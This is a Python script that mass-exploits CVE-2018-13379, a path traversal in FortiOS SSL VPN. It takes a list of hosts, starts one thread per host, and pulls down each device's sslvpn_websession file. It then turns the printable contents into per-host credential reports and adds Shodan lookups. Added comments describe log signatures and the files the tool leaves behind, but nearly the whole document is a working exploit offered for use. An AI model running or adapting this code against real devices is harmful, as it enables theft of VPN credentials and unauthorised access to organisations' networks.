CVE-2018-13379.py
import requests, sys, time
import lxml.html as lh
import pandas as pd
import urllib3
import thread
import time
import sys
import os
# Suppress urllib3 warnings, including the InsecureRequestWarning that the
# verify=False requests in leak() and check() would otherwise print.
urllib3.disable_warnings()
class bcolors:
    """ANSI escape sequences used to colour and style the console output."""

    # Text attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

    # Foreground colours
    FAIL = '\033[91m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    OKBLUE = '\033[94m'
    HEADER = '\033[95m'

    # Resets every attribute set above
    ENDC = '\033[0m'
# Startup banner: tool title and author credit, written to stdout.
print("".join((bcolors.HEADER, bcolors.BOLD, " [>] ", bcolors.OKGREEN,
               "FortiOS Credentials Disclosure - Auto Exploiter", bcolors.ENDC)))
print("".join((bcolors.HEADER, bcolors.BOLD, " [>] ", bcolors.OKGREEN,
               "Exploit Dev : 0xHunter", bcolors.ENDC, '\r\n')))
def leak(host, port):
    """Fetch the SSL VPN web-session file from host:port and hand it to parse().

    Sends the CVE-2018-13379 request: a GET to /remote/fgt_lang whose ``lang``
    parameter contains "../" traversal sequences and names
    /dev/cmdb/sslvpn_websession. A body containing "var fgt_lang =" is saved
    as sslvpn_websession_<host>.dat in the working directory and parsed.

    Returns True when the marker was found and the dump was processed, False
    when the marker is absent or the connection fails.

    Defender notes: the request is recognisable in web/VPN logs by the
    /remote/fgt_lang path combined with "../" sequences or
    /dev/cmdb/sslvpn_websession in ``lang``. If such a request was answered
    with content, apply the vendor fix for CVE-2018-13379 and treat the SSL
    VPN credentials and sessions on that device as exposed (the tool's banner
    describes the file as a credentials disclosure).
    """
    # NOTE(review): this listing lost its indentation; the nesting below is
    # reconstructed, and parse() is assumed to run after the with-block has
    # closed the dump file.
    try:
        url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
        # Browser-like headers; the User-Agent sent here is the bare string "Mozilla/5.0".
        headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
        # verify=False: the server certificate is not validated.
        r=requests.get(url, headers=headers, verify=False, stream=True)
        # Read the body from the underlying raw stream rather than r.content / r.text.
        img=r.raw.read()
        # The marker string is what this tool treats as proof the file was returned.
        if "var fgt_lang =" in str(img):
            # The raw body is written through a text-mode ('w') handle.
            with open("sslvpn_websession_"+host+".dat", 'w') as f:
                f.write(img)
            parse(host,port)
            print("\n")
            return True
        else:
            return False
    except requests.exceptions.ConnectionError:
        # Only connection failures are handled; other exceptions propagate to the caller.
        return False
def is_character_printable(s):
    """Return True when every character of ``s`` has a code point in 32..126.

    That range is printable ASCII (space through tilde). An empty ``s``
    yields True because there is nothing to reject.
    """
    return all(32 <= ord(ch) < 127 for ch in s)
def is_printable(byte):
    """Return ``byte`` unchanged if it is printable ASCII, otherwise '.'.

    Printability is decided by is_character_printable(); the '.' stand-in is
    the usual placeholder in the text column of a hex dump.
    """
    return byte if is_character_printable(byte) else '.'
def read_bytes(host, chunksize=8192):
    """Yield the contents of sslvpn_websession_<host>.dat one byte at a time.

    The file is opened in binary mode from the current working directory and
    read ``chunksize`` bytes per call until a read returns nothing.
    """
    dump_path = "sslvpn_websession_" + host + ".dat"
    with open(dump_path, "rb") as dump:
        # iter() with a sentinel stops at the first empty read (end of file).
        for block in iter(lambda: dump.read(chunksize), b""):
            for item in block:
                yield item
def parse(host,port):
    """Turn the saved session dump for ``host`` into a text report, <host>.txt.

    The report starts with the VPN address, then rows scraped from the
    target's Shodan host page, then the printable content of
    sslvpn_websession_<host>.dat. The .dat file is deleted at the end.

    Forensic note: <host>.txt files (and leftover
    sslvpn_websession_<host>.dat files) in a working directory are the
    artefacts this tool leaves on the machine it was run from.
    """
    # NOTE(review): this listing lost its indentation; the nesting below is reconstructed.
    print(bcolors.BOLD + bcolors.OKBLUE + "[>] " + bcolors.OKGREEN + host + ':' + port + ' Is Vulnerable - Exploiting...' + bcolors.ENDC)
    memory_address = 0  # running offset into the dump, counted per item read
    ascii_string = ""  # output line currently being assembled
    report = 'VPN : ' + host + ':' + port + '\r\n'
    try:
        # Third-party lookup: each host judged vulnerable is also requested from shodan.io.
        url = "https://www.shodan.io/host/"+host
        headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
        page = requests.get(url, headers=headers)
        doc = lh.fromstring(page.content)
        tr_elements = doc.xpath('//tr')
        info = ''
        for t in tr_elements:
            # Each table row's text is split on newlines; items 1 and 2 are used as "label : value".
            name=t.text_content().split('\n')
            info += name[1] + ' : ' + name[2] + '\r\n'
        report += info + '\r\n'
    except Exception as e:
        # Re-raised unchanged, so a failed lookup or an unexpected row shape
        # ends parse() before the report is written or the .dat file removed.
        raise e
    for byte in read_bytes(host):
        # Non-printable items become '.', as in the text column of a hex dump.
        ascii_string = ascii_string + is_printable(byte)
        if memory_address%61 == 60:
            # A full 61-item line: keep it unless it equals the all-dots literal below.
            if ascii_string!=".............................................................":
                report = report + ascii_string + '\r\n'
                #print(report)
            ascii_string = ""
        memory_address = memory_address + 1
    # A final line shorter than 61 items is not appended to the report.
    content = str(report)
    f = open(host+'.txt', 'w');
    f.write(content)
    f.close()
    # The raw dump is removed once the report exists.
    os.remove("sslvpn_websession_"+host+".dat");
def check(host, port):
    """Return True when the traversal request to host:port is answered with HTTP 200.

    The same /remote/fgt_lang request as leak() is sent, but only the status
    code is inspected; the "var fgt_lang =" content marker is checked later,
    in leak(). Any other status, and any exception at all, yields False.

    Defender note: no headers are passed here, so the HTTP client's default
    headers are sent, whereas leak() sends a "Mozilla/5.0" User-Agent. A
    target that is probed and then dumped therefore sees the same URI twice
    with two different header sets.
    """
    # NOTE(review): this listing lost its indentation; the nesting below is reconstructed.
    uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    try:
        # verify=False: the server certificate is not validated.
        r = requests.get("https://" + host + ":" + port + uri, verify=False)
        if(r.status_code == 200):
            return True
        elif(r.status_code == 404):
            return False
        else:
            # Same result as the 404 branch above.
            return False
    except:
        # Bare except: every failure, of any kind, is reported as "not vulnerable".
        return False
def main(host, port):
    """Run check() against one target and, when it returns True, leak().

    Otherwise print "<host>:<port> Is Secure". check() returns False for any
    non-200 status and for any exception, so that message also covers hosts
    that were unreachable; it is not evidence that a device is patched.
    """
    vuln = check(host, port)
    if(vuln):
        # The return value is stored but not used afterwards.
        bin_file = leak(host, port)
    else:
        print(bcolors.BOLD+bcolors.HEADER+"[-] " + bcolors.OKBLUE+ host + ':' +port + '\tIs Secure ' + bcolors.ENDC)
# Script driver: takes one argument, a text file with one "host" or
# "host:port" entry per line, and starts main() for every entry.
# NOTE(review): this listing lost its indentation; the nesting below is reconstructed.
if len(sys.argv) != 2:
    print(bcolors.BOLD+bcolors.HEADER+ " [>] " + bcolors.OKGREEN + 'Usage : python ' + sys.argv[0] + ' List.txt' + bcolors.ENDC)
    exit()
file = sys.argv[1]
# The handle is rebound over the path name and is not closed in this script.
file = open(file, "r")
urls = file.readlines()
# Counter starts at 1 and is incremented before the comparison below.
integer_c = 1
for url in urls:
    integer_c += 1
    if len(urls) == integer_c:
        print(bcolors.BOLD+bcolors.HEADER+"[*] " + bcolors.OKGREEN+'List Finished... ' + bcolors.ENDC)
        print(bcolors.BOLD+bcolors.HEADER+"[*] " + bcolors.OKGREEN+'Waiting to compelete job... ' + bcolors.ENDC)
        print(bcolors.BOLD+bcolors.HEADER+"[*] " + bcolors.OKGREEN+'Code By Kod3r... ' + bcolors.ENDC)
    url = url.replace('\n', '')
    url = url.split(':')
    host = url[0]
    # Entries without an explicit port default to 443.
    if len(url) == 1:
        port = '443'
    else:
        port = url[1]
    time.sleep(0.2)
    # One thread per list entry, started 0.2 seconds apart (Python 2 `thread` module).
    thread.start_new_thread( main, (url[0], port, ) )
# Keeps the main thread alive after the list is exhausted; the loop has no exit condition.
while 1:
    pass